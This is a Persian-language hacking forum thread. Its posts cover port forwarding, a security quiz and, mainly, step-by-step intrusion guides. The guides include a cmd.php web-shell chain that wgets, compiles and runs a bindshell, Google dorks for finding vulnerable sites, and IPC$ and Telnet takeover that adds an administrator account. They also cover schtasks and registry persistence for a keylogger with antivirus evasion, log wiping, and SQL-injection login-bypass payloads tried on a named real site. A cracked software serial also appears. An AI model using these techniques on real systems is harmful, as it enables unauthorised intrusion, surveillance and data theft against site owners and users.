برای مثال وقتی از برنامه µTorrent استفاده می کنم. پیغام می ده که پورتی که استفاده می کنید توسط فایروال مسدوده و به همین علت سرعت دانلود خیلی کمه در صورتی که من در فایوال برنامه رو آزاد کردم ولی نمی دونم چطوری می شه پورت رو آزاد کرد. یه برنامه هم هست به نام PFConfig که کار PortForward رو انجام می ده ولی به اولا کرک نشده دوما خیلی پیچیده بود. اگه راهنمایی کنید ممنون می شم
و در آخر یک سوال شما خودتون آزاد به این اطلاعات رسیدید یا در یکی از رشته های MCSE و یا Cisco درس خونیدین ؟؟؟ (که اگه درسش رو خوندین یه تاپیک درباره آموزش این دروس باز کنید)

دوست من برای باز کردن پورتی بر روی کامپیوتر باید 1 برنامه نویس حرفه ایی باشی .
ولی بعضی پورت ها در کامپیوتر هستن که به صورت دستی میشه آن ها را باز کرد مثلا پورت های 21 و 21 و 23 و 80 و135 و...
برای باز کردن هر پورتی راه جداگانه است که برای آموزش از google استفاده کنید .
بله من mcse2003 , ccna , ccnp , cwna را در قبرس خوانده ام ولی من اطلاعاتم را مدیون دانش از اینترنت و سایت های خارجی هستم که حتما طی پستی به شما معرفی می کنم

black_demented
18-09-2006, 11:43
بله من mcse2003 , ccna , ccnp , cwna را در قبرس خوانده ام ولی من اطلاعاتم را مدیون دانش از اینترنت و سایت های خارجی هستم که حتما طی پستی به شما معرفی می کنم
از راهنماییت ممنون (البته هنوز به دستم نرسیده)
در ضمن من هم چند کورس از MCSE رو خوندم (مثل Net+, NEt Infra,Win 2003 Server, Win 2003 Per) تا حد MCP ولی به علت مشکلات مالی نتونستم ادامه بدم. فکر می کنم اگه یه تاپیک جدید باز کنید و دروس MCSE رو از ابتدا آموزش بدی خیلی کار بزرگ و خوبی می شه. من هم تا جایی که از دستم بر بیاد کمکتون می کنم. (البته سواد من در حد شما نیست) خواهش می کنم رو پیشنهاد من فکر کنید

pastoo
18-09-2006, 12:02
اين حفره با نام cmd.php شناخته ميشه پس از اينکه سايت مورد نظرتون دارای اين حفره بود کافيه بدين صورت در آدرس تایپ کنيد:
www.victim.com/downloads/uploads/cmd.php?cmd=id
uid=32125(baker) gid=32125(baker) groups=32125(baker)
اين برای اين هست که بدونيد شما دارای چه سطحی در کامپيوتر مورد نظر هستيد.
حالا نوبت به شناسايی OS سيستم يا همون سیستم عامل برای اينکار اينطور تایپ ميکنيم:
www.victim.com/downloads/uploads/cmd.php?cmd=uname%20-a (http://www.victim.com/downloads/uploads/cmd.php?cmd=uname%20-a) و جواب معمولا :
Linux dolphin.victim.com 2.4.20-20.9 #1 Mon Aug 18 11:45:58 EDT 2003 i686 i686 i386 GNU/Linux
خوب ميبينيد که سرور لينوکس هست حالا نوبت اينه که از يک bindshell برای نفوذ بدرون اين سرور استفاده کنيد
من اين بايند شل رو برای لينوکس توصيه ميکنم :
http://packetstormsecurity.nl/advisories/suid/bindshell.c (http://packetstormsecurity.nl/advisories/suid/bindshell.c)
خوب حالا ميخوايم اين بايند شل رو بفرستيم توی سرور مورد نظرمون پس اين کار رو انجام ميديم:
www.victim.com/downloads/uploads/cmd.php?cmd=wget%20http://packetstormsecurity.nl/advisories/suid/bindshell.c (http://www.victim.com/downloads/uploads/cmd.php?cmd=wget%20http://packetstormsecurity.nl/advisories/suid/bindshell.c)
حالا بايد اين بايند شل رو توی اون کامپيوتر کامپايل کنيم کار ساده ای هستش اگه که کمی لينوکس بلد باشيم:
www.victim.com/downloads/uploads/cmd.php?cmd=gcc%20-o%20bind%20bindshell.c (http://www.victim.com/downloads/uploads/cmd.php?cmd=gcc%20-o%20bind%20bindshell.c)
با اينکار بايند شل ما درون ترمينال لينوکس با جی سی سی کامپايل ميشه.
حالا نوبت ران کردن بايند شل هستش :
www.victim.com/downloads/uploads/cmd.php?cmd=./bind (http://www.victim.com/downloads/uploads/cmd.php?cmd=./bind)
خوب ديگه حالا کافيه به پورت ۱۲۳۴ سرور کانکت بشيد.
خوب ديگه حالا شل داريد يکمی لينوکس بلد باشيد تمومه ميتونيد .
------------------------------------------------------------------------------------
* منظور از www.victim.com (http://www.victim.com/) آدرس سایتی هست که شما می خوایید هکش کنید .
* برای پیدا کردن سایتی که این حفره رو داره می تونید از گوگل کمک بگیرید به این صورت :
http://www.google.com/searchhl=en&lr=&q=inurl%3Acmd.php+cmd (http://www.google.com/searchhl=en&lr=&q=inurl%3Acmd.php+cmd)
یا
http://www.google.com/searchhl=en&lr=&q=intitle%3A%22Index+of%22+cmd.php (http://www.google.com/searchhl=en&lr=&q=intitle%3A%22Index+of%22+cmd.php)

pastoo
18-09-2006, 12:03
يكي از نرم افزار هاي مورد نياز GFI:LANguard Security Scaner هست كه بخاطر قدرت و كارايي اين برنامه را پيشنهاد ميكنم كه فقط بايد يكسري
تغييرات رو روي آن انجام بدين اين برنامه را از سايت زير داونلود كنيد
http://www.kyzj.com/ (http://www.kyzj.com/)
Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU
البته ورژن 3.3 هم هست ولي من ورژن 3.2 را پيشنهاد ميكنم كه در سايت بالا ورژن 3.2 وجود دارد و سريال بالا نيز مربوط به همين ورژن هست
حالا بايد يكسري تغييرات در اين برنامه بديم .
1.option را انتخاب كنيد و به قسمت Scanning برويد و اين شاخه را انتخاب كنيد Configure ports و حالا در قسمت
Port number/range:1025
port desciription:network blackjacket
و حالا ADD PORT را بزنيد .
در قسمت New scan بايد يك Range اي پي رو اسكن كنيد تا يك اي پي با مشخصات زير پيدا شود
پرت هاي باز 1025,139 را داشته باشد .
IPC share نيز داشته باشد
حالا بايد به اين اي پي به صورت زير كانكت شويد :
1.در قسمت Run اين جمله را وارد كنيد CMD
2. دستور زير را وارد كنيد :
Net use IpadressIPC$""/user:Administrator
اگر دستور زير را دريافت كردين
Successfully The Command was completed
از اي پي مورد نظر Share گرفتين و در اختيار شماست اما در غير اينصورت Share داراي پسوورد ميباشد كه من براي كرك كردن پسسوورد از اين برنامه
استقاده ميكنم :
PQWAK
كه اين برنامه رو از سايت Download.com دريافت كنيد .
بعد از كرك از پسوورد بدست آمده اينگونه استفاده كنيد
Net use ipadressIPC$ "password"/user:administrator
در صورتيكه ميخواهيد با Telnet كانكت شويد مراحل زير را طي كنيد .
در قسمت RUN تايپ كنيد Regedit
به اين آدرس برويد HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet NTLMàServer--1.0
حالا Value date اين فايل رو به اين جمله تغيير دهيد : 1à2
در قسمت بعدي به RUN برويد و اين دستور را تايپ كنيد TELNET
دستور زير را وارد كنيد Telnet ipadress
در ادامه اگر از شما يوزر و پسوورد خواست يوزر را Administrator و پسسورد را خالي بگذاريد
حالا احتياج به ساختن يك يوزر براي خود داريد . اين دستور را در ادامه وارد كنيد :
Net user username password/add
حالا براي قرار دادن يوزر خود در گروه ادمين ها اين دستور را وارد كنيد
Net groups Administrators username/add
تمام شد شما به هدف خود رسيده ايد اما من براي تازه كارها روش اول را پيشنهاد ميكنم
ولي دوستان ديگر ميتوانند از Telnet استفاده كنند
نكته : من هيچ مسئوليتي در مورد تغيير رجيستري نميپذيرم اگر شما قادر به Edit رجيستري نيستيد بهتره از آن يه Backup تهيه كنيد .

pastoo
18-09-2006, 12:04
دستورات زير چکيده اي از دستورات مورد نياز مديران شبکه و البته هکرهاي عزيز است .

شما حتما با برنامه Scheduled Tasks در ويندوز کار کرده ايد . اين برنامه که رابطي در محيط گرافيکي دارد مي تواند طوري تنظيم شود که در يک زمان يک برنامه را اجرا کند .

توسط دستور SchTasks مي توان تنظيمات اين برنامه را به صورت Command-Line انجام داد .

به دليل ساده بودن سوييج ها از توضيح آنها صرف نظر کرده و فقط به مثال هايي از اين دستور اکتفا مي کنيم .

شکل کلي اين دستور به شکل زير است :



SchTasks /Create or ... /TN [TaskName] /TR [TaskToRun] /SC [ScheDuleType] /MO [ModiFier]



در قسمت اول که مشخص مي کنيم ميخواهيم Task را ايجاد، پاک و يا ... کنيم .

در قسمت /TN نامي را براي Task خود انتخاب مي کنيم .

در قسمت /TR مسير برنامه اي را که مي خواهيم اجرا شود را مشخص مي کنيم . ( اگر فرد تيز هوشي باشيد مي توانيد دستورات خود را هم اجرا کنيد . به اين صورت که دستورات را داخل NotePad مي نويسيد و بعد با پسوند Bat ذخيره مي کنيد و بعد آدرس اين فايل را ميدهيد )

در قسمت /SC قالب اجراي برنامه را مشخص مي کنيد که مي تواند شامل Monthly - Weekly - Daily - Minute - Once - OnLogon - OnStart باشد .

و در قسمت /MO مي توان زمان و تاريخ اجراي برنامه را تعريف نمود .

اين دستور برنامه ي مورد نظر را هر 10 دقيقه اجرا مي کند :

SchTasks /Create /TN "MOJY" /TR c:\windows\system32\Keyloger.exe /SC minute /MO 10

اين دستور برنامه ي مورد نظر را در هنگام بالا آمدن ويندور اجرا مي کند :

SchTasks Create /TN "MOJY" /TR c:\windows\system32\Keyloger.exe /SC onStart



از اين دستور بجاي اجراي خودکار برنامه از طريق ريجستري مي توان استفاده کرد و از دست AntiVirus تا حدودي فرار کرد . الته اگر فردي به اين دستورات کاملا تسلط داشته باشد با سوييچ /Query اين دستور مي تواند از اين موضوع مطلع شود .



با اضافه کردن سوييچ /SD به آخر اين دستور و دادن تاريخ مورد نظر به صورت mm/dd/yyyy ميتوان برنامه را در يک تاريخ معين اجرا کرد .



براي پاک کردن يک Task از سوييچ /Delete به صورت زير مي توان استفاده کرد :

SchTasks /Delete /TN [TaskName]

براي متوقف کردن Task بدين صورت مي توان عمل کرد :

SchTasks /End /TN [TaskName]

براي ديدن تمام Task ها بدين صورت عمل مي کنيم :

SchTasks /Query

بسته به خلاقيت شما ميتوان دستورهاي جالبي را خلق کرد .



يکي از مزييت هاي ديگر اين دستور اين است که ما نمي خواهيم هنگامي که داخل کامپوتر قرباني هستيم دستوري را اجرا يا برنامه اي را فعال کنيم چون ممکن است باعث گير افتادن ما شود . برنامه را کوک مي کنيم براي موقعي که ما از سيستم قرباني بيرون رفته ايم .



آيا مي دانيد که از طريق خط فرمان هم امکان ويرايش در Registry وجود دارد ؟

بله مي شود . با دستور Reg مي توان اين کار را عملي کرد .

به شرح اين دستور مي پردازيم .

همان طور که مي دانيد ريجستري داراي 5 شاخه يا RootKey مي باشد .

در اين دستور اين 5 شاخه به صورت زير تعريف شده اند :

HKEY_CURRENT_USER --> HKCU

HKEY_LOCAL_MECHINE --> HKLM

HKEY_CLASSES_ROOT --> HKCR

HKEY_USER --> HKU

HKEY_CURRENT_CONFIG --> HKCC

مقدار ها هم به صورت زير تعريف شده اند :

BINARY VALUE --> REG_BINARY

DWORD VALUE --> REG_DWORD

STRING VALUE --> REG_EXPAND_SZ



به دليل ساده بودن سوييج ها از توضيح آنها صرف نظر کرده و فقط به مثال هايي از اين دستور اکتفا مي کنيم .

براي پيدا نمودن يا انجام يک پرس و جو از يک مقدار در ريجستري بدين صورت عمل ميکنيم :

Reg Qurey [RootKey] /v [ValueName]

Reg Query HKLM\software\microsoft\windows\currentversion\Run /v Keyloger



براي ايجاد يک مقدار در ريجستري بدين صورت عمل مي کنيم :



Reg Add [RootKey] /v [ValeuName] /t DataType /d Data



Reg Add HKLM\software\microsoft\windows\currentversion\Run /v Keyloger /t REG_EXPAND_SZ /d '%systemRoot%\system32\keyloger.exe'



براي پاک کردن يک مقدار از ريجستري بدين عمل مي کنيم :

Reg Delete [RootKey] /v [ValueNme]

Reg Delete HKLM\software\microsoft\windows\currentversion\Run /v Keyloger



مديريت سرويس ها يکي از مهمترين کارهاي اساسي يک مدير شبکه است .

Stop - Run - Disable - Enable کردن سرويس ها .

گرفتن اطلاعات در مورد يک سرويس خاص و کارهاي ديگري که در مديريت سرويس ها قابل انجام است .

همه اين کارها را از طريق خط فرمان و با دستور Sc مي توان انجام داد .

اين دستور داراي سوييچ هاي بسيار متعدد است که البته چند مورد از آنها که توضيح داده مي شود مور نياز ما هستند .

سوييچ هاي مورد نياز ما Qurey - Strat - Stop - Pause - Continue - Config مي باشند که در مورد هر کدام مثال هايي خواهيم زد .

براي ديدن تمام سرويس هاي Run - Disable و ... از اين دستور استفاده مي کنيم :

Local --> Sc Query Type= service state= all

Remote --> Sc \\[IP Address ] Query type= service state= all



براي ديدن تمام سرويس هاي فعال :

Sc Query type= service state= Active

براي ديدن تمام سرويس هاي غير فعال :

Sc Query type= service state= inactive

براي ديدن اطلاعات کامل در مورد يک سرويس :

Sc qc [ServiceName]

براي Start - Stop - Pause - Continue کردن يک سرويس به ترتيب :

Sc Start [ServixeName]

Sc Stop [ServixeName]

Sc Pause [ServixeName]

Sc Continue [ServixeName]

سرويس ها را به سه صورت مي شه Config کرد : Automatic - Manoel - Disable

Config کردن سرويس به صورت Automatic :

Sc Config [ServiceName] Start=Auto

Config کردن سرويس به صورت Manoel :

Sc Config [ServiceName] start=Demand

Config کردن سرويس به صورت Disable :

Sc Config [ServiceName] Start=Disabled



مديريت Log File ها نتنها در ويندوز بلکه در تمام سيستم عامل ها و وب سرور ها و در تمام روتين هاي امنيتي کاري بسيار مهم و ضروري است .

اين Log File ها مانند يک IDS کوچک هستنند . چرا که تمام فعاليت هاي امنيتي . کاربردي و سيستمي را Monitor کرده و از آنها Log بر ميدارند .

مطالعه اين فايلها در تشخيص نفوذ به ما خيلي کمک مي کنند .

سيستم عامل ويندوز داراي يک ابزار گرافيکي ويک ابزار خط فرمان براي مطالعه اين Log File ها مي باشد که ما ابزار خط فرمان ويندوز را توضيح ميدهيم .

با استفاده از فرمان EventQuery ميتوان اين فايل ها را مشاهده کرد .

EventQuery [LogNmae]

که براي ديدن Log هاي Security - Application - System به ترتيب از دستور هاي زير استفاده مي کنيم :

EvenQuery /L "Security"

EvenQuery /L "Application"

EvenQuery /L "System"

اما با اين دستور اين Log File ها را فقط مي توان مشاهده نمود و نمي توان آنها را ويرايش کرد .

توسط برنامه WinZapper که داراي حجم بسيار کمي هم هست مي توان به صورت Local نوع Log File را مشخص نمود و تک تک آن ها را پاک کرد .

اين برنامه رو مي توانيد از سايت http://www.NtSecurity.nu (http://www.ntsecurity.nu/) به صورت رايگان Download کنيد .



دستور Convert :

توسط اين دستور بدون نياز به Fdisk مجدد مي توان فت يک درايو را از Fat 16 به NTFS تغيير داد :

Convert [DraiveName]:/fs:NTFS

Convert c:/fs:NTFS

pastoo
18-09-2006, 12:41
با نام و ياد او .

كنفرانس Back hat را شايد بتوان از معتبرترين كنفرانس هاي ضد امنيت دنيا ناميد ، هر ساله در هنگام برگزاري كنفرانس ها CD هاي آن كنفرانس كه شامل :

1- مقالات و Power point ها
2- فيلم ها
3- ابزار هاي خاص .

ميباشند ، و به شركت كنندگان داده ميشود .

ما هم توانستيم اين CD ها را از سال 2002 به دست آوريم ، كه ميتوانيد از اين لينك ها دريافت كنيد .
(فايل ها به صورت iso ميباشد )

Cd سال 2004 :
http://defcon.lostboxen.net/discs/bh_us_2004.iso (http://defcon.lostboxen.net/discs/bh_us_2004.iso)

CD سال 2005 :
http://defcon.lostboxen.net/discs/bh_us_2005.zip (http://defcon.lostboxen.net/discs/bh_us_2005.zip)

Cd ضد امنيت سال 2006 (سپتمبر - آمريكا)
http://defcon.lostboxen.net/discs/bh_usa_2006.iso (http://defcon.lostboxen.net/discs/bh_usa_2006.iso)

با تشکر از حسین عسگری عزیز مدیر محترم سایت سیمرغ به خاطر این مطلب

pastoo
18-09-2006, 12:43
با نام او :
كنفرانس Defcon نيز همانند blakhat يكي از معتبر تيرين كنفرانس هاي نفوذگري دنيا ميباشد .
شما ميتوانيد CD مربوط به defcon 14 (2006)d را از سايت سيمرغ دريافت كنيد .
فايل به صورت iso ميباشد .

در cd :
فيلم و مقالات و tools هاي سمينار را مشاهاده مينماييد .
(حق كپ يرايت براي سيمرغ محفوظ است )

fbehnaz
18-09-2006, 12:54
پستو جان خيلي ممنون از جوابتون ولي لينك هاي دانلود در پست هاي 189 و 190 خراب شده.

pastoo
18-09-2006, 13:53
پستو جان خيلي ممنون از جوابتون ولي لينك هاي دانلود در پست هاي 189 و 190 خراب شده.



http://rapidshare.de/files/33537957/logfilesedit4shir.zip (http://rapidshare.de/files/33537957/logfilesedit4shir.zip)

http://rapidshare.de/files/33537893/hiddenfhs.zip (http://rapidshare.de/files/33537893/hiddenfhs.zip)

black_demented
18-09-2006, 17:36
من هنوز منتظر پست شما (بابت پورت) هستم

pastoo
18-09-2006, 19:21
من هنوز منتظر پست شما (بابت پورت) هستم


من راجع به سوال شما در پست 317 جواب دادم
شما فقط قادر به باز کردن بعضی پورت ها به صورت دستی هستید از جمله 21و22و23و35و80و135 و ... و برای باز کردن بقیه احتیاج به دانستن زبان برنامه نویسی دارید . از google برای باز کردن پورت مورد نظر در دستگاه خود کمک بگیرید

black_demented
18-09-2006, 20:46
من راجع به سوال شما در پست 317 جواب دادم
شما فقط قادر به باز کردن بعضی پورت ها به صورت دستی هستید از جمله 21و22و23و35و80و135 و ... و برای باز کردن بقیه احتیاج به دانستن زبان برنامه نویسی دارید . از google برای باز کردن پورت مورد نظر در دستگاه خود کمک بگیرید

بابت کم سوادیم من رو ببخشید
همون که فرمودید بعضی پورتها را چطوری می شه باز کرد یا چطوری از گوگل کمک بگیرم و در آخر هم اگر اشتباه نکنم گفته بودید (در پست 317) که در پستهای آینده لینکهایی در این مورد برام میزارید.
باز هم معذرت
و باز هم تشکر

pastoo
19-09-2006, 00:57
بابت کم سوادیم من رو ببخشید
همون که فرمودید بعضی پورتها را چطوری می شه باز کرد یا چطوری از گوگل کمک بگیرم و در آخر هم اگر اشتباه نکنم گفته بودید (در پست 317) که در پستهای آینده لینکهایی در این مورد برام میزارید.
باز هم معذرت
و باز هم تشکر



ببین دوست من اگه میخوای پورتی رو از دست فایروال راحت کنی و آن را در دستگاه خودت باز کنی به ترتیب عملیاتی رو که در زیر ذکر می کنم عمل کن به نتیجه میرسی ولی اگه دیدی باز نرم افزارت مشکل می گیره باید شما از طریق برنامه نویسی عمل کنی


1.Click Start, and then click My Network Places.2.Under Network Tasks, click View Network Connections. (Or, right-click My Network Places on the desktop, and then click Properties.)3.Right-click the connection that you use for the Internet, and then click Properties.4.Click the Advanced tab, and then click Settings.

Note If the Settings button is unavailable, ICF is not enabled on this connection, and you do not have to open any ports (because they are all already open).5.Click Add to open a new port.6.In the Description box, type a friendly name. For example, type File Sharing : Port 445.7.In the Name or IP address of the computer hosting this service on your network box, type 127.0.0.1.

Note You can specify the IP address of an internal computer. But you typically will use 127.0.0.1.8.In the External port and Internal port boxes, type the port number. Generally, this number is the same.9.Click either TCP or UDP, and then click OK.10.Repeat steps 1 through 9 for each port that you want to open.

pastoo
19-09-2006, 23:21
نکته : بسياري از سايت ها داراي اين ضعف امنيتي هستند .
البته در اين مقاله به خاطر سنگيني مطالب توضيحاتي ندادم و فقط باگهاي موجود بر روي اين سرويس رو براي شما مشخص كرده و توضيح ميدهم :
در اين قسمت شما با فرستادن درخواستهاي غير عادي به سرور باعث مختل كردن كار سرور و نهايتا با فرستادن Query هاي خود به سرور حمله كرده و ميتونيد اس كيو ال رو اينجكشن كنيد .
در ادامه براي ايجاد اينجكشن كردن اين نوع سرويس از كد هاي زير استفاده كنيد


http://server/instaboard/index.cfmfrmid=1&tpcid=1%20SQL
http://server/instaboard/index.cfmfrmid=1%20SQL&tpcid=1
http://server/instaboard/index.cfmpr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
http://server/instaboard/index.cfmpr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
http://server/instaboard/index.cfmcatid=1%20SQL

هر يك ار اين كد هاي درخواست هاي مختلفي رو به سرور ميفرستد كه براي هر كدوم خروجي هاي مختلف دريافت ميشود و اطالاعات مورد نظر شما رو براي شما ارسال ميكند
البته براي حل اين مشكل راه هاي مختلفي وجود داره اما اگه ورژن برنامه ي شما رجيستر شده است ميتونيد تغييراتي در CFQUERY انجام بدين و اين مشكلات رو بر طرف كنيد
بصورت زير عمل كنيد :
به اين شاخه برويد :
queries/oraclen/qry_GetOriginalMessage.cfm
و اين قسمت را پاك كرده :
WHERE m.tpcid = #tpcid#
AND m.userid = u.userid
AND m.msgid = #msgid#

و بجاي آن اين را قرار بدهيد :
WHERE m.tpcid = #VAL(tpcid)#
AND m.userid = u.userid
AND m.msgid = #VAL(msgid)#

مشاهده خواهيد كرد كه اين باگ در اين سرويس فيكس ميشود
Sql Injection
يكي از نقطه ضعف هاي Sql رشته ي ساختار ان ميباشد كه هميشه آسيب پذير بوده و مورد حمله قرار ميگيرد اين آموزش به شما روشهايي ياد ميده كه بتوانيد اين ساختار را مورد حمله قرار بدهيد .
حالا ميتوانيد در گوگل عبارت زير را سرچ كنيد :
login.asp
در جواب براي شما تقريبا 17 هزار مورد پيدا ميكند . حالا به لينك يافته ها دقت كنيد مثلا چنين خواهيد يافت :
www.site.com/login.asp
يا چيزهايي مشابه اين . اين قسمتها را ميتوانيم مورد حمله قرار دهيم . حالا به ساده ترين قسمت رسيديم
كافي است براي رد كردن اين مانع بصورت زير عمل كنيد
بجاي يوزر نيم Admin را بزنيد و بجاي پسورد از اين عبارت استفاده كنيد
or 1=1—
شايد تا حالا كه مقاله را خوانده ايد تعجب كرده ايد كه اين امر چگونه امكان پذير است . در تمامي اين عمليات اطلاعات لاگين شما بصورت Query فرستاده ميشود . اگر اطلاعات درست باشد شما اجازه ي ورود خواهيد يافت وگرنه با پيغام Login Failed مواجه خواهيد شد . وقتي شما ارسالي را با يوزر ادمين و با پسورد 1234 را ارسال ميكنيد از حالت اول به حالت دوم تغيير پيدا ميكند :
حالت اول :
"select *from table1 where login=""&log&""and password=""pwd&"" '
حالت دوم‌:

"select *from table1 where login="Admin"and password="1234" '
حالا با استفاده از اين تركيبات شما ميتوانيد با توجه به ساختار اس كيو ال براي آن پسورد هايي ارسال كنيد كه در صورت قرار گرفتن در اين پسورد مورد قبول قرار گيرد و در واقع با استفاده از نقطه ضعف Query Stringsبه آن حمله كند . اين تركيبات كه با توجه به ساختار اس كيو ال نوشته شده به اين صورت ميباشد نمونه هايي از آن مشاهده ميكنيد :
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

مثال : http://www.sms4iran.com (http://www.sms4iran.com/)
نام کاربری را یک نام انتخاب کنید مثل amir و پسورد رو بزنید "or" حالا وارد یوزر امیر شدید ! اما این یوزر فعال نیست به قسمت تغیر رمز برید و پسورد قبلی را "or" و ژسورد جدید را 1234 وارد کنید بعد به صفحه اصلی برید و یوزر و پسورد جدید را بزنید حالا کل پانل امیر در دست شماست و . . .
همانطور كه مشاهده كرديد اين روش يك روش ساده اما ابتكاري مباشذ كه احتياج به تفكر دقيق دارد البته ساختار ها متفاوت ميباشند و شما ميتوانيد همه ي اين تركيبات بالا را به عنوان پسورد امتحان كنيد و حتما به جواب خواهيد رسيد .

pastoo
20-09-2006, 18:29
متن زير يك تست سريع و آموزنده مي باشد كه به برخي از سوالات شما در زمينه امنيت اطلاعات پاسخ مي دهد. همانطور كه خواهيد ديد به صورت پرسش و پاسخ بيان شده است.
باب امنيت اطلاعات اغلب پيچيده مي باشد. بر همين اساس اين مبحث به برخي از سوالاتي كه ممكن است براي شما ايجاد شود ، پاسخ داده است و پيشنهاداتي را براي آن ارائه داده است تا به سادگي قبول كنيد كه سيستم هاي شما نيز ممكن است در معرض خطر قرار گيرد.

1-اگر امنيت اطلاعات را افزايش دهيم ، كارايي كاهش پيدا مي كند. درست يا غلط ؟
درست – امنيت اطلاعات هزينه مربوط به خودش را دارد. افزايش امنيت اطلاعات ممكن است به روالهاي موثر اضافي از جمله «تكنولوژي» و «سرمايه گذاري » نياز داشته باشد.
افزايش امنيت اطلاعات ممكن است پيشرفت جريان كار را با كندي مواجهه كند و اين امر ممكن است در كارايي افراد و شبكه شما نمود پيدا كند. امنيت اطلاعات ممكن است به معني قفل كردن ايستگاههي كاري و محدود كردن دسترسي به اتاقهاي كامپيوتر و سرور شما باشد. هر سازماني بايد هنگامي كه به مقوله امنيت اطلاعات مي پردازد به صورت انديشمندانه اي بين خطرات ( Risks ) و كارآيي توازن برقرار كند.

2-حملاتي كه توسط نفوذگران خارجي انجام مي گيرد نسبت به حملات كارمندان داخلي هزينه بر تر و خسارت بار تر مي باشد. درست يا غلط ؟
غلط- حملات كارمندان داخلي نوعا بسيار خسارت بار تر از حملات خارجي گزارش شده است. بر طبق آمارهاي انستيتو امنيت كامپيوتر (Compuetr Security Inistitu ) ميانگين حملات خارجي 57000 دلار و ميانگين هزينه حملات داخلي 2700000 دلار برآورد شده است.
كارمندان داخلي اطلاعات محرمانه بيشتري درباره سيستم هاي هدف در دسترس دارند از آن جمله مي توان اطلاعاتي درباره فعاليت هاي ديده باني (Monitoring ) را نام برد (به خصوص نقاط ضعف اين فعاليتها )

3-پيكربندي يك ديواره آتش (Firewall ) به صورت كامل ما ر در مقابل حملات خارجي ايمن مي كند. درست يا غلط ؟
غلط – آمارهاي انستيو امنيت كامپيوتر نشان مي دهد كه 3/1 شركتهايي كه از ديواره آتش استفاده كرده اند هنوز از دست نفوذگران بد انديش در امان نمانده اند. اولين كاركرد ديواره آتش بستن پورتهاي مشخص مي باشد به همين دليل در بعضي از مشاغل نياز است كه بعضي از پورتها باز باشد. هر پورت باز مي تواند يك خطري را براي سازمان ايجاد كند و يك معبر براي شبكه شما باشد.
ترافيكي كه از ميان يك پورت مي گذرد را بايد هميشه به صورت سختگيرانه اي ديده باني (Monitor ) كرد تا تمامي تلاشهايي كه منجر به نفوذ در شبكه مي شود شناسايي و گزارش شود.
يك ديواره آتش به تنهايي نمي تواند يك راه حل جامع باشد و بايد از آن به همراه تكنولوژي هاي IDS (Intrusion Detection System ) و روشهاي تركيبي استفاده كرد.

4-اگر ديواره آتش من به صورت مناسبي پيكر بندي شود ديگر نيازي به ديده باني بيشتر ترافيك شبكه نمي باشد. درست يا غلط ؟
غلط – هميشه نفوذگران خبره مي توانند يك ديواره آتش را در هم شكنند و به آن نفوذ كنند. به همين دليل ديده باني كليدي براي هر برنامه امنيت اطلاعات مي باشد. فراموش نكنيد كه ديواره آتش نيز ممكن است هك شود و IDS ها راهي مي باشند براي اينكه بدانيد چه سيستم هايي در شرف هك شدن مي باشند.

5-ديواره هاي آتش بايد به گونه اي پيكربندي شوند كه علاوه بر ترافيك ورودي به شبكه ، ترافيك هاي خروجي را نيز كنترل كنند . درست يا غلط ؟
درست - بسياري از سازمانها توجه زيادي به محدود كردن ترافيك ورودي خود دارند ، اما در مقايسه توجه كمتري در مسدود كردن ترافيك خروجي از شبكه را دارند. خطرات زيادي ممكن است در درون سازمان وجود داشته باشد. يك كارمند ناراضي يا يك نفوذگر كه شبكه شما را در دست گرفته است ، ممكن است كه بخواهد اطلات حساس و محرمانه شما را براي شركت رقيب بفرستد.

6-امنيت اطلاعات به عنوان يك مبحث تكنولوژيكي مطرح است درست يا غلط ؟
غلط – امنيت اطلاعات يك پي آمد تجاري - فرهنگي مي باشد. يك استراتژي جامع امنيت طلاعات بايد شامل سه عنصر باشد: روالها و سياستهاي اداري ، كنترل دسترسي هاي فيزيكي ، كنترل دسترسي هاي تكنيكي . اين عناصر – اگر به صورت مناسبي اجرا شود – مجموعا يك فرهنگ امنيتي ايجاد مي كند. بيشتر متخصصين امنيتي معتقدند كه تكنولوژيهاي امنيتي فقط كمتر از 25 درصد مجموعه امنيت را شامل مي شوند. حال آنكه در ميان درصد باقيمانده آنچه كه بيشتر از همه نمود دارد ،« افراد » مي باشند. (كاربر انتهايي) افراد يكي از ضعيف ترين حلقه ها ، در هر برنامه امنيت اطلاعات مي باشند.

7-هرگاه كه كارمندان داخلي ناراضي از اداره اخراج شوند ، خطرات امنيتي از بين مي روند. درست يا غلط ؟
غلط – به طور واضح غلط است. براي شهادت غلط بودن اين موضوع مي توان به شركت Meltdown اشاره كرد كه لشكري از كارمندان ناراضي اما آشنا به سرقتهاي كامپيوتري براي خود ايجاد كرده بود. بر طبق گفته هاي FBI حجم فعاليتهاي خرابكارانه از كارمندان داخلي افزايش يافته است. همين امر سازمانها را با خطرات جدي در آينده مواجهه خواهد كرد.

8-نرم افزارهاي بدون كسب مجوز (Unauthorized Software ) يكي از عمومي ترين رخنه هاي امنيتي كاربران داخلي مي باشد. درست يا غلط ؟
درست – رخنه ها (Breaches ) مي تواند بدون ضرر به نظر بيايد ، مانند Screen Saver هاي دريافت شده از اينترنت يا بازي ها و ...
نتيجه اين برنامه ها ، انتقال ويروس ها ، تروجانها و ... مي باشد. اگر چه رخنه ها مي تواند خطرناكتر از اين باشد. ايجاد يا نصب يك برنامه كنترل از راه دور كه مي تواند يك در پشتي (Backdoor ) قابل سوءاستفاده اي را در شبكه ايجاد كند كه به وسيله ديواره آتش نيز محافظت نمي شود.
بر طبق تحقيقاتي كه توسط ICSA.net و Global Integrity انجام شده است بيش از 78 درصد گزارش ها مربوط به ايجاد يك رخنه در نرم افزار دريافتي از افراد يا سايتهاي ناشناخته است.

9-خسارتهاي ناشي از سايتهاي فقط اطلاعاتي كمتر از سايتهاي تجاري مي باشد. درست يا غلط ؟
